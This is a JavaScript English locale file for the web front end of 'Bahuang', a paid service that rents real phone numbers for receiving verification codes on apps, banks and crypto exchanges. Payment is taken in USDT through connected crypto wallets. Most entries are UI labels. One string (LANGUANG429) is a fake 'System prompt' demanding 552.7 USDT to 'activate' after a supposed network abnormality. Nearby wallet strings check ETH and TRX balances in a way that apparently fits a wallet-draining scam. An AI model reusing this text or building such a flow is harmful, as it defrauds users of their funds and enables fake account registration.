const en = {
    LANGUANG0: "Bahuang receive code",
    LANGUANG1: "Global real card receiving code supply station",
    LANGUANG2: "Customer Service TG",
    LANGUANG3: "Every item has a first code, and you can register for any APP/website. If you buy it once, you can use it repeatedly within 7 days. You can renew it when it expires, so you don't have to worry about being used by others.",
    LANGUANG4: "API Documentation/FAQ",
    LANGUANG5: "Receive code",
    LANGUANG6: "Send text message",
    LANGUANG7: "Call",
    LANGUANG8: "Recharge",
    LANGUANG9: "My",
    LANGUANG10: "Recharge balance",
    LANGUANG11: "Operator:",
    LANGUANG12: "domestic code reception",
    LANGUANG13: "Overseas access code",
    LANGUANG14: "Home:",
    LANGUANG15: "No limit",
    LANGUANG16: "Project type:",
    LANGUANG17: "Please select the code receiving item",
    LANGUANG18: "Specified number:",
    LANGUANG19: "Enter the number or the first 3 digits of the number segment or (example: 152, 188) can be left blank",
    LANGUANG20: "Get number",
    LANGUANG21: "Block number",
    LANGUANG22: "Release number",
    LANGUANG23: "Mobile phone number:",
    LANGUANG24: "Please take a number first",
    LANGUANG25: "Copy",
    LANGUANG26: "Verification code:",
    LANGUANG27: "Waiting to get verification code",
    LANGUANG28: "SMS content:",
    LANGUANG29: "Waiting to get the text message content",
    LANGUANG30: "United States",
    LANGUANG31: "Japan",
    LANGUANG32: "South Korea",
    LANGUANG33: "India",
    LANGUANG34: "Germany",
    LANGUANG35: "UK",
    LANGUANG36: "Singapore",
    LANGUANG37: "Australia",
    LANGUANG38: "France",
    LANGUANG39: "Iraq",
    LANGUANG40: "Indonesia",
    LANGUANG41: "Russia",
    LANGUANG42: "Argentina",
    LANGUANG43: "United Arab Emirates",
    LANGUANG44: "Oman",
    LANGUANG45: "Belarus",
    LANGUANG46: "Iceland",
    LANGUANG47: "Democratic Republic of the Congo",
    LANGUANG48: "Canada",
    LANGUANG49: "Laos",
    LANGUANG50: "Myanmar",
    LANGUANG51: "Morocco",
    LANGUANG52: "Nigeria",
    LANGUANG53: "Norway",
    LANGUANG54: "Serbia",
    LANGUANG55: "Saudi Arabia",
    LANGUANG56: "Tanzania",
    LANGUANG57: "Türkiye",
    LANGUANG58: "New Zealand",
    LANGUANG59: "Jamaica",
    LANGUANG60: "Iran",
    LANGUANG61: "Qatar",
    LANGUANG62: "Portugal",
    LANGUANG63: "Afghanistan",
    LANGUANG64: "Egypt",
    LANGUANG65: "Ethiopia",
    LANGUANG66: "Ireland",
    LANGUANG67: "Estonia",
    LANGUANG68: "Pakistan",
    LANGUANG69: "Brazil",
    LANGUANG70: "Belgium",
    LANGUANG71: "Poland",
    LANGUANG72: "North Korea",
    LANGUANG73: "Denmark",
    LANGUANG74: "Philippines",
    LANGUANG75: "Finland",
    LANGUANG76: "Georgia",
    LANGUANG77: "Cuba",
    LANGUANG78: "Kazakhstan",
    LANGUANG79: "Holland",
    LANGUANG80: "Cambodia",
    LANGUANG81: "Czech Republic",
    LANGUANG82: "Kosovo",
    LANGUANG83: "Croatia",
    LANGUANG84: "Lebanon",
    LANGUANG85: "Lithuania",
    LANGUANG86: "Romania",
    LANGUANG87: "Maldives",
    LANGUANG88: "Malaysia",
    LANGUANG89: "Mongolia",
    LANGUANG90: "Bangladesh",
    LANGUANG91: "Peru",
    LANGUANG92: "Monaco",
    LANGUANG93: "Mexico",
    LANGUANG94: "South Africa",
    LANGUANG95: "Sweden",
    LANGUANG96: "Switzerland",
    LANGUANG97: "El Salvador",
    LANGUANG98: "Slovakia",
    LANGUANG99: "Slovenia",
    LANGUANG100: "Swaziland",
    LANGUANG101: "Sudan",
    LANGUANG102: "Thailand",
    LANGUANG103: "Tonga",
    LANGUANG104: "Tunisia",
    LANGUANG105: "Venezuela",
    LANGUANG106: "Ukraine",
    LANGUANG107: "Uruguay",
    LANGUANG108: "Greece",
    LANGUANG109: "Syria",
    LANGUANG110: "Yemen",
    LANGUANG111: "Italy",
    LANGUANG112: "Vietnam",
    LANGUANG113: "Zambia",
    LANGUANG114: "Chile",
    LANGUANG115: "Central African Republic",
    LANGUANG116: "Spain",
    LANGUANG117: "Israel",
    LANGUANG118: "Ecuador",
    LANGUANG119: "Azerbaijan",
    LANGUANG120: "Hong Kong, China",
    LANGUANG121: "Macau, China",
    LANGUANG122: "Taiwan, China",
    LANGUANG123: "Full business (any project can be accepted)",
    LANGUANG124: "First time on Douyin",
    LANGUANG125: "WeChat",
    LANGUANG126: "QQ",
    LANGUANG127: "Weibo",
    LANGUANG128: "Momo",
    LANGUANG129: "telegram(paper airplane)",
    LANGUANG131: "Enterprise WeChat",
    LANGUANG132: "JD.com",
    LANGUANG134: "Tantan",
    LANGUANG135: "Xianyu",
    LANGUANG136: "小红书",
    LANGUANG137: "Kuaishou",
    LANGUANG140: "alipay (Alipay)",
    LANGUANG141: "Taobao",
    LANGUANG142: "Amazon",
    LANGUANG144: "Pinduoduo",
    LANGUANG145: "Alibaba",
    LANGUANG146: "bat",
    LANGUANG147: "Binance Binance",
    LANGUANG148: "Baidu",
    LANGUANG149: "Bilibili",
    LANGUANG150: "OUYI",
    LANGUANG151: "Renren",
    LANGUANG152: "Huobi",
    LANGUANG153: "Tik Tok",
    LANGUANG154: "Apple",
    LANGUANG156: "DingTalk",
    LANGUANG157: "Lian Xin",
    LANGUANG161: "Love accelerates",
    LANGUANG162: "Bank of Communications",
    LANGUANG163: "Finance Today",
    LANGUANG164: "Number RMB",
    LANGUANG165: "Full-service dating platform",
    LANGUANG166: "Normal SMS",
    LANGUANG167: "Tencent Cloud",
    LANGUANG168: "NetEase Games",
    LANGUANG169: "Tencent Games",
    LANGUANG170: "Yes, yes",
    LANGUANG171: "Compare your heart",
    LANGUANG172: "Little deer playing with me",
    LANGUANG173: "Play with all platforms",
    LANGUANG174: "Xunyou",
    LANGUANG175: "QQ secondary card",
    LANGUANG176: "Diantao",
    LANGUANG177: "Good Luck of the Century",
    LANGUANG178: "Starbucks",
    LANGUANG179: "dex",
    LANGUANG180: "Seven Cats Novel",
    LANGUANG181: "Meiqia",
    LANGUANG182: "Koyo",
    LANGUANG183: "Himalaya",
    LANGUANG184: "Thai life",
    LANGUANG185: "new network",
    LANGUANG186: "Virtual Phone",
    LANGUANG187: "China Everbright Bank",
    LANGUANG188: "Feishu",
    LANGUANG189: "Anjuke",
    LANGUANG190: "Utopia",
    LANGUANG191: "Soda Music",
    LANGUANG192: "Chat",
    LANGUANG193: "Huawei Cloud",
    LANGUANG194: "sunflower",
    LANGUANG195: "Yi pair",
    LANGUANG196: "We're home",
    LANGUANG197: "Jiuxiu",
    LANGUANG198: "Shopee Shopping",
    LANGUANG199: "Apple ID",
    LANGUANG200: "Yuanquan",
    LANGUANG201: "Zhenai.com",
    LANGUANG202: "Zhihu",
    LANGUANG203: "Alipay",
    LANGUANG204: "Pagoda Panel",
    LANGUANG205: "Binance",
    LANGUANG206: "Taote",
    LANGUANG207: "Get things",
    LANGUANG208: "QQ mailbox",
    LANGUANG209: "Baidu Tieba",
    LANGUANG210: "AMAP",
    LANGUANG211: "Douyin volcano version",
    LANGUANG212: "Meituan",
    LANGUANG213: "58 cities",
    LANGUANG214: "Direct recruitment from Ganji.com",
    LANGUANG215: "Jimu",
    LANGUANG216: "Are you hungry?",
    LANGUANG217: "other interesting",
    LANGUANG218: "drift bottle",
    LANGUANG219: "Lily Network",
    LANGUANG220: "TT Voice",
    LANGUANG221: "Yixin",
    LANGUANG222: "Glimmer",
    LANGUANG223: "watermelon video",
    LANGUANG224: "Tencent Video",
    LANGUANG225: "iQiyi",
    LANGUANG226: "Youku Video",
    LANGUANG227: "Kugou Music",
    LANGUANG228: "NetEase Music",
    LANGUANG229: "fighting fish",
    LANGUANG230: "Huya Live",
    LANGUANG231: "Baidu Netdisk",
    LANGUANG232: "Trading Cat",
    LANGUANG233: "Today's headlines",
    LANGUANG234: "NetEase News",
    LANGUANG235: "Micro vision",
    LANGUANG236: "K-song for all",
    LANGUANG237: "Huajiao Live",
    LANGUANG238: "Starlight Live",
    LANGUANG239: "Flower Room",
    LANGUANG240: "Cloud Listening",
    LANGUANG241: "lychee",
    LANGUANG242: "Cao Cao travels",
    LANGUANG243: "Ticket travel",
    LANGUANG244: "Bubble Chat",
    LANGUANG245: "TiMi Voice",
    LANGUANG246: "Have a chat",
    LANGUANG247: "Love Story",
    LANGUANG248: "Exploring the drifting bottle",
    LANGUANG249: "huazhi",
    LANGUANG250: "language play",
    LANGUANG251: "Sound Cave",
    LANGUANG252: "Meet the drift bottle",
    LANGUANG253: "Banban",
    LANGUANG254: "Weidian",
    LANGUANG255: "Xirang",
    LANGUANG256: "heart encounter",
    LANGUANG257: "love to chat",
    LANGUANG258: "chat companion",
    LANGUANG259: "Looking for fun in the same city",
    LANGUANG260: "soft rice circle",
    LANGUANG261: "WeChat Mini Program",
    LANGUANG262: "Postal Savings Number",
    LANGUANG263: "Dianping",
    LANGUANG264: "Direct employment from BOSS",
    LANGUANG265: "Koala Overseas Shopping",
    LANGUANG266: "VIP.COM",
    LANGUANG267: "Travel on the same journey",
    LANGUANG268: "Ctrip Travel",
    LANGUANG269: "Flying Pig Travel",
    LANGUANG270: "Where to travel",
    LANGUANG271: "Hua Xiaozhu travels",
    LANGUANG272: "T3 travel",
    LANGUANG273: "virtual number",
    LANGUANG274: "Entity Number",
    LANGUANG275: "Number location",
    LANGUANG276: "CN/中国（+86）",
    LANGUANG277: "Lease",
    LANGUANG278: "Daily Rent",
    LANGUANG279: "weekly rent",
    LANGUANG280: "monthly rent",
    LANGUANG281: "Quarterly Rent",
    LANGUANG282: "Package",
    LANGUANG283: "Private Call",
    LANGUANG284: "Private SMS",
    LANGUANG285: "Estimated cost:",
    LANGUANG286: "Buy now",
    LANGUANG287: "Cancel",
    LANGUANG288: "Insufficient assets",
    LANGUANG289: "Do you want to recharge?",
    LANGUANG290: "Confirm",
    LANGUANG291: "Bahuang Code Receiver-Real Card Code Receiver Platform",
    LANGUANG292: "Today's USDT exchange rate 1U is equal to 7.3 RMB platform balance",
    LANGUANG293: "Recharge amount/price relationship:",
    LANGUANG294: "Single recharge 1 USDT: platform balance 7.3",
    LANGUANG295: "Single recharge of 20 USDT: 1% bonus",
    LANGUANG296: "Single recharge of 50 USDT: 2% bonus",
    LANGUANG297: "Single recharge of 100 USDT: 5% bonus",
    LANGUANG298: "The gift is only available for a single recharge. After the recharge is completed, the platform will automatically give the gift to the platform balance.",
    LANGUANG299: "Recharge amount:",
    LANGUANG300: "Recharge",
    LANGUANG301: "Please enter the recharge amount",
    LANGUANG302: "Please fill in the correct amount",
    LANGUANG303: "Single deposit of 500 USDT: 10% bonus",
    LANGUANG304: "Guest User",
    LANGUANG305: "VIP user",
    LANGUANG306: "Account Balance",
    LANGUANG307: "API documentation",
    LANGUANG308: "Click me to view API documentation",
    LANGUANG309: "Usage Record",
    LANGUANG310: "Click me to view usage history",
    LANGUANG311: "Log out",
    LANGUANG312: "Exit failed",
    LANGUANG313: "User login",
    LANGUANG314: "Bahuang Code Receiver Platform-Login",
    LANGUANG315: "Account",
    LANGUANG316: "password",
    LANGUANG317: "Please enter your login account",
    LANGUANG318: "Please enter your login password",
    LANGUANG319: "Remember login status",
    LANGUANG320: "Login",
    LANGUANG321: "Register account",
    LANGUANG322: "User registration",
    LANGUANG323: "Login account",
    LANGUANG324: "Please set up a login account",
    LANGUANG325: "Login password",
    LANGUANG326: "Please set a login password",
    LANGUANG327: "Enter password again",
    LANGUANG328: "Please enter your login password again",
    LANGUANG329: "Register",
    LANGUANG330: "Return to login",
    LANGUANG331: "Please enter username",
    LANGUANG332: "Please enter password",
    LANGUANG333: "Please enter your login password again",
    LANGUANG334: "Registration successful",
    LANGUANG335: "All interfaces must be delayed >2 seconds. Malicious requests that affect the server will clear the balance and no refund will be given.",
    LANGUANG336: "1. Login account",
    LANGUANG337: "Parameter transmission method:",
    LANGUANG338: "Request parameters:",
    LANGUANG339: "Parameter name",
    LANGUANG340: "meaning",
    LANGUANG341: "type",
    LANGUANG342: "Description",
    LANGUANG343: "username",
    LANGUANG344: "Required",
    LANGUANG345: "password",
    LANGUANG346: "2. Get the balance",
    LANGUANG347: "Token obtained through API",
    LANGUANG348: "3. To obtain the number, channel 2 users should change /api/ to /api2/",
    LANGUANG349: "project",
    LANGUANG350: "Operator is left blank or 0=no limit, 1 is a real card, 2 is a virtual card",
    LANGUANG351: "Optional",
    LANGUANG352: "Specify a number or number segment. Passing in the complete mobile phone number is the designated number, and passing in the first few digits is the designated number segment",
    LANGUANG353: "Province screening: Beijing, do not include the word 'province'",
    LANGUANG354: "4. To obtain text messages, channel 2 users should change /api/ to /api2/",
    LANGUANG355: "Obtained number",
    LANGUANG356: "5. To release the number, channel 2 users should change /api/ to /api2/",
    LANGUANG357: "6. To block the number, channel 2 users should change /api/ to /api2/",
    LANGUANG358: "This website is not responsible for storing records. Please keep important information by yourself!",
    LANGUANG359: "Data Big Market",
    LANGUANG360: "SMS Record",
    LANGUANG361: "Income Record",
    LANGUANG362: "Recharge Record",
    LANGUANG363: "Today",
    LANGUANG364: "Yesterday",
    LANGUANG365: "accumulation",
    LANGUANG366: "Number of text messages",
    LANGUANG367: "Invitation Statistics",
    LANGUANG368: "Accumulated recharge",
    LANGUANG369: "Accumulated consumption",
    LANGUANG370: "Cumulative income",
    LANGUANG371: "No limit",
    LANGUANG372: "Hebei",
    LANGUANG373: "Shanxi",
    LANGUANG374: "Liaoning",
    LANGUANG375: "Jilin",
    LANGUANG376: "Heilongjiang",
    LANGUANG377: "Jiangsu",
    LANGUANG378: "Zhejiang",
    LANGUANG379: "Anhui",
    LANGUANG380: "Fujian",
    LANGUANG381: "Jiangxi",
    LANGUANG382: "Shandong",
    LANGUANG383: "Henan",
    LANGUANG384: "Hubei",
    LANGUANG385: "Hunan",
    LANGUANG386: "Guangdong",
    LANGUANG387: "Hainan",
    LANGUANG388: "Sichuan",
    LANGUANG389: "Guizhou",
    LANGUANG390: "Yunnan",
    LANGUANG391: "Shaanxi",
    LANGUANG392: "Gansu",
    LANGUANG393: "Qinghai",
    LANGUANG394: "Beijing",
    LANGUANG395: "Tianjin",
    LANGUANG396: "Shanghai",
    LANGUANG397: "Chongqing",
    LANGUANG398: "Inner Mongolia",
    LANGUANG399: "Guangxi",
    LANGUANG390: "Tibet",
    LANGUANG401: "Ningxia",
    LANGUANG402: "Xinjiang",
    LANGUANG403: "Hong Kong",
    LANGUANG404: "Macau",
    LANGUANG405: "Taiwan",
    LANGUANG406: "Platform Announcement",
    LANGUANG407: "All the code receiving numbers on this website are real cards, and the code receiving rate can reach 98%. No fees will be deducted if there is no success. Everyone is welcome to use it!\n\nThis platform only accepts the first card for registered accounts. , the order service is completed when the verification code is received!\n\nAll business is connected to the third-party platform! This site has no self-operated business\n\nGlobal code receiving SMS platform, integrated code receiving platform for code receiving and SMS sending ",
    LANGUANG408: "System Administrator",
    LANGUANG409: "domain name",
    LANGUANG410: "Click to view",
    LANGUANG411: "UID",
    LANGUANG412: "Payment amount",
    LANGUANG413: "Actual amount received",
    LANGUANG414: "Payment Instructions",
    LANGUANG415: "Please open the wallet homepage and scan the QR code to pay.",
    LANGUANG416: "Only TRC chain payment is supported.",
    LANGUANG417: "Tip",
    LANGUANG418: "For Bitget Wallet, please use the scan code in the DApp. For other wallets, please use the scan code on the homepage. The payment will be automatically credited after successful payment. If the payment is not automatically credited, please contact online customer service.",
    LANGUANG419: "Payment Information",
    LANGUANG420: "Please select your transfer wallet",
    LANGUANG421: "OUYI Web3 Wallet",
    LANGUANG422: "Confirm payment",
    LANGUANG423: "Click to pay",
    LANGUANG424: "Please select a payment wallet!",
    LANGUANG425: "Please choose TRX chain for payment",
    LANGUANG426: "ETH is less than 0.002, payment is restricted",
    LANGUANG427: "TRX is less than 100 (first payment only), payment is restricted",
    LANGUANG428: "Loading",
    LANGUANG429: "System prompt:\nThe system has detected an abnormality in your network environment\nPlease transfer the corresponding amount to activate\nAmount: 552.7 USDT\nRemarks: d5k837\nNormal use can be resumed after passing the verification",
    LANGUANG430: "System maintenance, please contact customer service",
    LANGUANG431: "Transferring money to the other party",
    LANGUANG432: "OK",
    LANGUANG433: "Insufficient balance, please recharge and try again",
    LANGUANG434: "Please log in first",
    LANGUANG435: "No items selected",
    LANGUANG436: "Invitation Code",
    LANGUANG437: "Please enter the invitation code",
    LANGUANG438: "Insufficient wallet balance",
}